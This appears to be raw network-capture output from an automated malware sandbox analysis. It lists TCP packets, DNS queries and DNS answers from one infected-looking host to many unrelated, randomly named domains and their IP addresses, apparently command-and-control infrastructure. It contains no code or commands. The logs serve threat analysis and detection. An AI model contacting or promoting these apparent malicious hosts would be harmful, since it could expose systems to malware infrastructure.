                                                                                                                                                                                Nov 29, 2024 09:18:21.652508020 CET5002280192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:21.772476912 CET8050022208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:22.885838032 CET8050022208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:22.885891914 CET5002280192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:23.154030085 CET5002280192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:23.274347067 CET8050022208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:24.173192024 CET5002380192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:24.293448925 CET8050023208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:24.293549061 CET5002380192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:24.310187101 CET5002380192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:24.430234909 CET8050023208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:25.453834057 CET8050023208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:25.453891993 CET5002380192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:25.810316086 CET5002380192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:25.930373907 CET8050023208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:26.829952002 CET5002480192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:26.950320959 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:26.950426102 CET5002480192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:26.970633030 CET5002480192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:27.091892958 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:27.091916084 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:27.091963053 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:27.092001915 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:27.092057943 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:27.092233896 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:27.092262030 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:27.092360020 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:27.092370033 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:28.109865904 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:28.111232996 CET5002480192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:28.482530117 CET5002480192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:28.602628946 CET8050024208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:29.500802994 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:29.621153116 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:29.621290922 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:29.630059004 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:29.750854015 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.437751055 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.437772989 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.437921047 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.437944889 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.438030958 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.438044071 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.438066959 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.438169956 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.438180923 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.438193083 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.438203096 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.438205957 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.438224077 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.438291073 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.438322067 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.557900906 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.557945967 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.558058023 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.562083006 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.630151033 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.630229950 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.630234003 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.634310961 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.634373903 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.634428978 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.642731905 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.642788887 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.642849922 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.651185036 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.651235104 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.651326895 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.659621954 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.659674883 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.659728050 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.668065071 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.668118954 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.668174028 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.676636934 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.676687002 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.676775932 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.684914112 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.684968948 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.685023069 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.693392038 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.693445921 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.693526983 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.701781988 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.701837063 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.701878071 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.750303984 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.750323057 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.750380993 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.822191000 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.822257996 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.822261095 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.824708939 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.824765921 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.824803114 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.829705954 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.829758883 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.829767942 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.834763050 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:31.834862947 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.837938070 CET5002580192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:31.957926035 CET8050025208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:37.489171982 CET5002680192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:37.609157085 CET8050026217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:37.609235048 CET5002680192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:37.625813007 CET5002680192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:37.746175051 CET8050026217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:38.930466890 CET8050026217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:38.930507898 CET8050026217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:38.930542946 CET8050026217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:38.930551052 CET5002680192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:38.930628061 CET5002680192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:39.138459921 CET5002680192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:40.159950972 CET5002780192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:40.280814886 CET8050027217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:40.287936926 CET5002780192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:40.302102089 CET5002780192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:40.422063112 CET8050027217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:41.675199986 CET8050027217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:41.675252914 CET8050027217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:41.675266027 CET8050027217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:41.675298929 CET5002780192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:41.675331116 CET5002780192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:41.810354948 CET5002780192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:42.831948996 CET5002880192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:42.952019930 CET8050028217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:42.952111959 CET5002880192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:42.969819069 CET5002880192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:43.089893103 CET8050028217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:43.089905977 CET8050028217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:43.089967012 CET8050028217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:43.089976072 CET8050028217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:43.090015888 CET8050028217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:43.090033054 CET8050028217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:43.090127945 CET8050028217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:43.090141058 CET8050028217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:43.090152025 CET8050028217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:44.332782030 CET8050028217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:44.332804918 CET8050028217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:44.332868099 CET8050028217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:44.336008072 CET5002880192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:44.483953953 CET5002880192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:45.500463963 CET5002980192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:45.620573044 CET8050029217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:45.620707035 CET5002980192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:45.630177975 CET5002980192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:45.750153065 CET8050029217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:47.005672932 CET8050029217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:47.005693913 CET8050029217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:47.005702972 CET8050029217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:47.005810022 CET8050029217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:47.005824089 CET5002980192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:47.005851030 CET8050029217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:47.005872011 CET5002980192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:47.005884886 CET5002980192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:47.065125942 CET5002980192.168.2.4217.160.0.200
                                                                                                                                                                                Nov 29, 2024 09:18:47.185230017 CET8050029217.160.0.200192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:53.386990070 CET5003080192.168.2.4154.70.82.246
                                                                                                                                                                                Nov 29, 2024 09:18:53.508358002 CET8050030154.70.82.246192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:53.508438110 CET5003080192.168.2.4154.70.82.246
                                                                                                                                                                                Nov 29, 2024 09:18:53.525882006 CET5003080192.168.2.4154.70.82.246
                                                                                                                                                                                Nov 29, 2024 09:18:53.645920038 CET8050030154.70.82.246192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:55.030407906 CET5003080192.168.2.4154.70.82.246
                                                                                                                                                                                Nov 29, 2024 09:18:55.152118921 CET8050030154.70.82.246192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:55.152182102 CET5003080192.168.2.4154.70.82.246
                                                                                                                                                                                Nov 29, 2024 09:18:56.047224998 CET5003180192.168.2.4154.70.82.246
                                                                                                                                                                                Nov 29, 2024 09:18:56.167483091 CET8050031154.70.82.246192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:56.168081999 CET5003180192.168.2.4154.70.82.246
                                                                                                                                                                                Nov 29, 2024 09:18:56.180109978 CET5003180192.168.2.4154.70.82.246
                                                                                                                                                                                Nov 29, 2024 09:18:56.300246954 CET8050031154.70.82.246192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:57.685345888 CET5003180192.168.2.4154.70.82.246
                                                                                                                                                                                Nov 29, 2024 09:18:57.808135986 CET8050031154.70.82.246192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:57.808198929 CET5003180192.168.2.4154.70.82.246
                                                                                                                                                                                Nov 29, 2024 09:18:58.703979015 CET5003280192.168.2.4154.70.82.246
                                                                                                                                                                                Nov 29, 2024 09:18:58.824208975 CET8050032154.70.82.246192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:58.824451923 CET5003280192.168.2.4154.70.82.246
                                                                                                                                                                                Nov 29, 2024 09:18:58.840838909 CET5003280192.168.2.4154.70.82.246
                                                                                                                                                                                Nov 29, 2024 09:18:58.960967064 CET8050032154.70.82.246192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:58.960993052 CET8050032154.70.82.246192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:58.961034060 CET8050032154.70.82.246192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:58.961042881 CET8050032154.70.82.246192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:58.961080074 CET8050032154.70.82.246192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:58.961113930 CET8050032154.70.82.246192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:58.961150885 CET8050032154.70.82.246192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:58.961215973 CET8050032154.70.82.246192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:58.961224079 CET8050032154.70.82.246192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:19:00.357353926 CET5003280192.168.2.4154.70.82.246
                                                                                                                                                                                Nov 29, 2024 09:19:00.477850914 CET8050032154.70.82.246192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:19:00.480058908 CET5003280192.168.2.4154.70.82.246
                                                                                                                                                                                Nov 29, 2024 09:19:01.376178980 CET5003380192.168.2.4154.70.82.246
                                                                                                                                                                                Nov 29, 2024 09:19:01.496220112 CET8050033154.70.82.246192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:19:01.496321917 CET5003380192.168.2.4154.70.82.246
                                                                                                                                                                                Nov 29, 2024 09:19:01.511279106 CET5003380192.168.2.4154.70.82.246
                                                                                                                                                                                Nov 29, 2024 09:19:01.631409883 CET8050033154.70.82.246192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:19:03.384107113 CET8050033154.70.82.246192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:19:03.384151936 CET8050033154.70.82.246192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:19:03.384246111 CET5003380192.168.2.4154.70.82.246
                                                                                                                                                                                Nov 29, 2024 09:19:03.392363071 CET5003380192.168.2.4154.70.82.246
                                                                                                                                                                                Nov 29, 2024 09:19:03.512425900 CET8050033154.70.82.246192.168.2.4

                                                                                                                                                                                UDP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Nov 29, 2024 09:15:51.092791080 CET5408453192.168.2.41.1.1.1
                                                                                                                                                                                Nov 29, 2024 09:15:51.966162920 CET53540841.1.1.1192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:08.626787901 CET5502753192.168.2.41.1.1.1
                                                                                                                                                                                Nov 29, 2024 09:16:09.638371944 CET5502753192.168.2.41.1.1.1
                                                                                                                                                                                Nov 29, 2024 09:16:09.732183933 CET53550271.1.1.1192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:09.778564930 CET53550271.1.1.1192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:24.626297951 CET5912153192.168.2.41.1.1.1
                                                                                                                                                                                Nov 29, 2024 09:16:25.126969099 CET53591211.1.1.1192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:39.838876963 CET6218453192.168.2.41.1.1.1
                                                                                                                                                                                Nov 29, 2024 09:16:40.825908899 CET6218453192.168.2.41.1.1.1
                                                                                                                                                                                Nov 29, 2024 09:16:41.446126938 CET53621841.1.1.1192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:41.446141005 CET53621841.1.1.1192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:44.577344894 CET5461853192.168.2.41.1.1.1
                                                                                                                                                                                Nov 29, 2024 09:16:44.722069979 CET53546181.1.1.1192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:49.737530947 CET5289553192.168.2.41.1.1.1
                                                                                                                                                                                Nov 29, 2024 09:16:50.056787968 CET53528951.1.1.1192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:04.503865004 CET6063653192.168.2.41.1.1.1
                                                                                                                                                                                Nov 29, 2024 09:17:05.056221008 CET53606361.1.1.1192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:19.861944914 CET6093253192.168.2.41.1.1.1
                                                                                                                                                                                Nov 29, 2024 09:17:20.288288116 CET53609321.1.1.1192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:34.752152920 CET6008953192.168.2.41.1.1.1
                                                                                                                                                                                Nov 29, 2024 09:17:35.215606928 CET53600891.1.1.1192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:49.595711946 CET5767753192.168.2.41.1.1.1
                                                                                                                                                                                Nov 29, 2024 09:17:50.594124079 CET5767753192.168.2.41.1.1.1
                                                                                                                                                                                Nov 29, 2024 09:17:51.032963991 CET53576771.1.1.1192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:51.033034086 CET53576771.1.1.1192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:05.892790079 CET5774353192.168.2.41.1.1.1
                                                                                                                                                                                Nov 29, 2024 09:18:06.455128908 CET53577431.1.1.1192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:20.932552099 CET5063953192.168.2.41.1.1.1
                                                                                                                                                                                Nov 29, 2024 09:18:21.510445118 CET53506391.1.1.1192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:36.847963095 CET6022453192.168.2.41.1.1.1
                                                                                                                                                                                Nov 29, 2024 09:18:37.486826897 CET53602241.1.1.1192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:52.082040071 CET6346553192.168.2.41.1.1.1
                                                                                                                                                                                Nov 29, 2024 09:18:53.076066971 CET6346553192.168.2.41.1.1.1
                                                                                                                                                                                Nov 29, 2024 09:18:53.383780003 CET53634651.1.1.1192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:53.383795023 CET53634651.1.1.1192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:19:08.407613039 CET5350653192.168.2.41.1.1.1
                                                                                                                                                                                Nov 29, 2024 09:19:08.872327089 CET53535061.1.1.1192.168.2.4

                                                                                                                                                                                DNS Queries

                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                Nov 29, 2024 09:15:51.092791080 CET192.168.2.41.1.1.10x4ba0Standard query (0)www.laohub10.netA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:16:08.626787901 CET192.168.2.41.1.1.10xfe6Standard query (0)www.5tuohbpzyj9.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:16:09.638371944 CET192.168.2.41.1.1.10xfe6Standard query (0)www.5tuohbpzyj9.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:16:24.626297951 CET192.168.2.41.1.1.10x819Standard query (0)www.canadavinreport.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:16:39.838876963 CET192.168.2.41.1.1.10x1ad7Standard query (0)www.phoenix88.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:16:40.825908899 CET192.168.2.41.1.1.10x1ad7Standard query (0)www.phoenix88.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:16:44.577344894 CET192.168.2.41.1.1.10xcbaeStandard query (0)www.phoenix88.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:16:49.737530947 CET192.168.2.41.1.1.10xd155Standard query (0)www.ana-silverco.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:17:04.503865004 CET192.168.2.41.1.1.10x6e48Standard query (0)www.gadgetre.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:17:19.861944914 CET192.168.2.41.1.1.10x2c37Standard query (0)www.acc888ommodate.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:17:34.752152920 CET192.168.2.41.1.1.10x13bStandard query (0)www.nb-shenshi.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:17:49.595711946 CET192.168.2.41.1.1.10x48a1Standard query (0)www.taxitayninh365.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:17:50.594124079 CET192.168.2.41.1.1.10x48a1Standard query (0)www.taxitayninh365.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:18:05.892790079 CET192.168.2.41.1.1.10x71b0Standard query (0)www.rtpmesinkoin.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:18:20.932552099 CET192.168.2.41.1.1.10xc65fStandard query (0)www.cortisalincontrol.netA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:18:36.847963095 CET192.168.2.41.1.1.10x9506Standard query (0)www.carsten.studioA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:18:52.082040071 CET192.168.2.41.1.1.10xfe9dStandard query (0)www.conseilnsaftogo.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:18:53.076066971 CET192.168.2.41.1.1.10xfe9dStandard query (0)www.conseilnsaftogo.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:19:08.407613039 CET192.168.2.41.1.1.10x3083Standard query (0)www.speedfactory.shopA (IP address)IN (0x0001)false

                                                                                                                                                                                DNS Answers

                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                Nov 29, 2024 09:15:51.966162920 CET1.1.1.1192.168.2.40x4ba0No error (0)www.laohub10.netr0lqcud7.nbnnn.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:15:51.966162920 CET1.1.1.1192.168.2.40x4ba0No error (0)r0lqcud7.nbnnn.xyz23.225.159.42A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:15:51.966162920 CET1.1.1.1192.168.2.40x4ba0No error (0)r0lqcud7.nbnnn.xyz23.225.160.132A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:15:51.966162920 CET1.1.1.1192.168.2.40x4ba0No error (0)r0lqcud7.nbnnn.xyz27.124.4.246A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:15:51.966162920 CET1.1.1.1192.168.2.40x4ba0No error (0)r0lqcud7.nbnnn.xyz202.79.161.151A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:16:09.732183933 CET1.1.1.1192.168.2.40xfe6No error (0)www.5tuohbpzyj9.buzz156.232.181.155A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:16:09.778564930 CET1.1.1.1192.168.2.40xfe6No error (0)www.5tuohbpzyj9.buzz156.232.181.155A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:16:25.126969099 CET1.1.1.1192.168.2.40x819No error (0)www.canadavinreport.site185.27.134.206A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:16:41.446126938 CET1.1.1.1192.168.2.40x1ad7Server failure (2)www.phoenix88.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:16:41.446141005 CET1.1.1.1192.168.2.40x1ad7Server failure (2)www.phoenix88.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:16:44.722069979 CET1.1.1.1192.168.2.40xcbaeServer failure (2)www.phoenix88.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:16:50.056787968 CET1.1.1.1192.168.2.40xd155No error (0)www.ana-silverco.shop104.21.90.137A (IP address)IN (0x0001)false
